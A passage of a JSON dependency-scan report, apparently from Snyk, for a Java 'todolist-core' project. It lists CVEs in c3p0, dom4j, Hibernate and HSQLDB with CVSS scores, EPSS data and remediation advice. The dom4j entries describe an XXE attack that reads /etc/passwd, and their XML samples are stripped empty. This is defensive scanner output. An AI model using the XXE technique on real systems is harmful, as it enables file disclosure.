"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "cvssV3BaseScore": 4.4, + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:14.895852Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.831457Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 4.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:53.496388Z" + } + ], + "description": "## Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n## References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n", + "epssDetails": { + "percentile": "0.90102", + "probability": "0.02457", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-5427" + ], + "CWE": [ + "CWE-776" + ], + "GHSA": [ + "GHSA-84p2-vf58-xhxv" + ] + }, + "packageName": "c3p0:c3p0", + "proprietary": false, + "creationTime": "2019-09-05T16:24:58.914446Z", + "functions_new": [ + { + "version": [ + "[0.9.1,]" + ], + "functionId": { + "className": "com.mchange.v2.c3p0.cfg.C3P0ConfigXmlUtils", + "functionName": "extractXmlConfigFromInputStream" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-04-22T22:18:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "c3p0", + "artifactId": "c3p0" + }, + "publicationTime": "2019-04-22T22:18:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:53.496388Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "type": "license", + "title": "LGPL-3.0 license", + "semver": { + "vulnerable": [ + "[0,)" + ] + }, + "license": "LGPL-3.0", + "language": "java", + "description": "LGPL-3.0 license", + "packageName": "c3p0:c3p0", + "creationTime": "2024-06-18T02:35:42.971Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T02:35:42.971Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "c3p0:c3p0@0.9.1.2" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "c3p0:c3p0", + "version": "0.9.1.2" + }, + { + "id": "SNYK-JAVA-DOM4J-174153", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "credit": [ + "Mario Areias" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.5, + "functions": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/Namespace.java", + "className": "Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "filePath": "org/dom4j/QName.java", + "className": "QName", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/dom4j/dom4j/issues/48", + "title": "GitHub Issue" + }, + { + "url": "https://ihacktoprotect.com/post/dom4j-xml-injection/", + "title": "POC: Ihacktoprotect Blog" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "cvssV3BaseScore": 6.1, + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "cvssV3BaseScore": 5.3, + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:00:55.789489Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 6.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:26.800032Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:19.987177Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 5.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.900402Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection due to improper validation of the `QName` inputs.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/e598eb43d418744c4dbf62f647dd2381c9ce9387)\n- [GitHub Issue](https://github.com/dom4j/dom4j/issues/48)\n- [POC: Ihacktoprotect Blog](https://ihacktoprotect.com/post/dom4j-xml-injection/)\n", + "epssDetails": { + "percentile": "0.70906", + "probability": "0.00325", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-1000632" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-6pcc-3rfx-4gpm" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2019-04-10T16:07:04.634619Z", + "functions_new": [ + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.Namespace", + "functionName": "" + } + }, + { + "version": [ + "[0,]" + ], + "functionId": { + "className": "org.dom4j.QName", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-01T19:12:29Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2018-08-21T14:16:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.900402Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.1.17.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-DOM4J-2812975", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[0,]" + ] + }, + "exploit": "Not Defined", + "fixedIn": [], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 7.4, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "dom4j:dom4j", + "references": [ + { + "url": "https://github.com/dom4j/dom4j/commit/a822852", + "title": "GitHub Commit" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1694235", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:31.083245Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:18.813214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:57.985080Z" + } + ], + "description": "## Overview\n[dom4j:dom4j](https://github.com/dom4j/dom4j) is a flexible XML framework for Java. *Note*: this artifact has been deprecated for `org.dom4j:dom4j`.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. By using the default `SaxReader()` provided by Dom4J, external DTDs and External Entities are allowed, resulting in a possible XXE.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nThere is no fixed version for `dom4j:dom4j`.\n\n## References\n- [GitHub Commit](https://github.com/dom4j/dom4j/commit/a822852)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1694235)\n", + "epssDetails": { + "percentile": "0.79800", + "probability": "0.00664", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10683" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-hwj3-m3p6-hj38" + ] + }, + "packageName": "dom4j:dom4j", + "proprietary": false, + "creationTime": "2022-05-10T12:56:27.582369Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2020-04-15T09:38:17Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "dom4j", + "artifactId": "dom4j" + }, + "publicationTime": "2020-04-16T15:22:50Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:57.985080Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final", + "dom4j:dom4j@1.6.1" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.1.17.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "dom4j:dom4j", + "version": "1.6.1" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-1041788", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,5.4.24.Final)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "5.4.24.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/loader/plan/exec/query/internal/SelectStatementBuilder.java", + "className": "SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Delete.java", + "className": "Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Insert.java", + "className": "Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/InsertSelect.java", + "className": "InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/QuerySelect.java", + "className": "QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Select.java", + "className": "Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/SimpleSelect.java", + "className": "SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "filePath": "org/hibernate/sql/Update.java", + "className": "Update", + "functionName": "toStatementString" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78", + "title": "GitHub Commit" + }, + { + "url": "https://access.redhat.com/security/cve/cve-2020-25638", + "title": "Redhat CVE Details" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "cvssV3BaseScore": 7.4, + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N/E:U/RL:O/RC:U", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:14.190706Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.602540Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.4, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:47.086548Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SQL comments of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks. The highest threat from this vulnerability is to data confidentiality and integrity.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.4.24.Final or higher.\n## References\n- [GitHub Commit](https://github.com/hibernate/hibernate-orm/commit/59fede7acaaa1579b561407aefa582311f7ebe78)\n- [Redhat CVE Details](https://access.redhat.com/security/cve/cve-2020-25638)\n", + "epssDetails": { + "percentile": "0.72103", + "probability": "0.00352", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25638" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-11-19T16:51:52.251545Z", + "functions_new": [ + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.loader.plan.exec.query.internal.SelectStatementBuilder", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Delete", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Insert", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.InsertSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.QuerySelect", + "functionName": "toQueryString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Select", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.SimpleSelect", + "functionName": "toStatementString" + } + }, + { + "version": [ + "[,5.4.24.Final)" + ], + "functionId": { + "className": "org.hibernate.sql.Update", + "functionName": "toStatementString" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-11-19T16:51:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-11-19T16:57:14.572204Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:47.086548Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.4.24.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHIBERNATE-584563", + "title": "SQL Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Gail Badner" + ], + "semver": { + "vulnerable": [ + "[,5.3.18.Final)", + "[5.4.0.Final, 5.4.18.Final)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "5.3.18.Final", + "5.4.18.Final" + ], + "patches": [], + "insights": { + "triageAdvice": "This vulnerability is only applicable on systems using JPA Criteria API" + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "filePath": "org/hibernate/query/criteria/internal/expression/LiteralExpression.java", + "className": "LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hibernate:hibernate-core", + "references": [ + { + "url": "https://github.com/hibernate/hibernate-orm/pull/3438", + "title": "GitHub Pull Request" + }, + { + "url": "https://hibernate.atlassian.net/browse/HHH-14077", + "title": "Jira Ticket" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 6.5, + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:47.723462Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:28.265729Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:49.262550Z" + } + ], + "description": "## Overview\n[org.hibernate:hibernate-core](https://github.com/hibernate/hibernate-orm) is a library providing Object/Relational Mapping (ORM) support to applications, libraries, and frameworks.\n\nAffected versions of this package are vulnerable to SQL Injection. A SQL injection in the implementation of the JPA Criteria API can permit unsanitized literals when a literal is used in the SELECT or GROUP BY parts of the query. This flaw could allow an attacker to access unauthorized information or possibly conduct further attacks.\n## Remediation\nUpgrade `org.hibernate:hibernate-core` to version 5.3.18.Final, 5.4.18.Final or higher.\n## References\n- [GitHub Pull Request](https://github.com/hibernate/hibernate-orm/pull/3438)\n- [Jira Ticket](https://hibernate.atlassian.net/browse/HHH-14077)\n", + "epssDetails": { + "percentile": "0.42797", + "probability": "0.00104", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14900" + ], + "CWE": [ + "CWE-89" + ] + }, + "packageName": "org.hibernate:hibernate-core", + "proprietary": false, + "creationTime": "2020-07-15T13:53:15.331818Z", + "functions_new": [ + { + "version": [ + "[5.1.18.Final ,5.4.18.Final)" + ], + "functionId": { + "className": "org.hibernate.query.criteria.internal.expression.LiteralExpression", + "functionName": "renderProjection" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-18T13:46:30Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "org.hibernate", + "artifactId": "hibernate-core" + }, + "publicationTime": "2020-07-15T16:40:12Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:49.262550Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [ + false, + "org.hibernate:hibernate-core@5.3.18.Final" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "snyk:lic:maven:org.hibernate:hibernate-core:LGPL-2.0", + "type": "license", + "title": "LGPL-2.0 license", + "semver": { + "vulnerable": [ + "[3.3.0.CR1, 5.3.1.Final)" + ] + }, + "license": "LGPL-2.0", + "language": "java", + "description": "LGPL-2.0 license", + "packageName": "org.hibernate:hibernate-core", + "creationTime": "2024-06-18T19:09:16.096Z", + "packageManager": "maven", + "publicationTime": "2024-06-18T19:09:16.096Z", + "severity": "medium", + "severityWithCritical": "medium", + "from": [ + "io.github.snyk:todolist-core@0.0.1-SNAPSHOT", + "org.hibernate:hibernate-core@4.3.7.Final" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "org.hibernate:hibernate-core", + "version": "4.3.7.Final" + }, + { + "id": "SNYK-JAVA-ORGHSQLDB-3040860", + "title": "Remote Code Execution (RCE)", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", + "credit": [ + "OSS Fuzz Team" + ], + "semver": { + "vulnerable": [ + "[,2.7.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.7.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "org.hsqldb:hsqldb", + "references": [ + { + "url": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=50212%23c7", + "title": "Chromium Bugs" + }, + { + "url": "https://github.com/ryenus/hsqldb/commit/b6719c67b41eb9298c2451ad2829bf03b262a941", + "title": "GitHub Commit" + }, + { + "url": "http://hsqldb.org/doc/2.0/guide/sqlroutines-chapt.html%23src_jrt_access_control", + "title": "Mitigation" + }, + { + "url": "https://sourceforge.net/p/hsqldb/svn/6614/tree//base/trunk/src/org/hsqldb/persist/HsqlDatabaseProperties.java", + "title": "SVN Commit" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:51:53.988304Z" + }, + { + "assigner": "Red Hat", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:53:59.414572Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H", 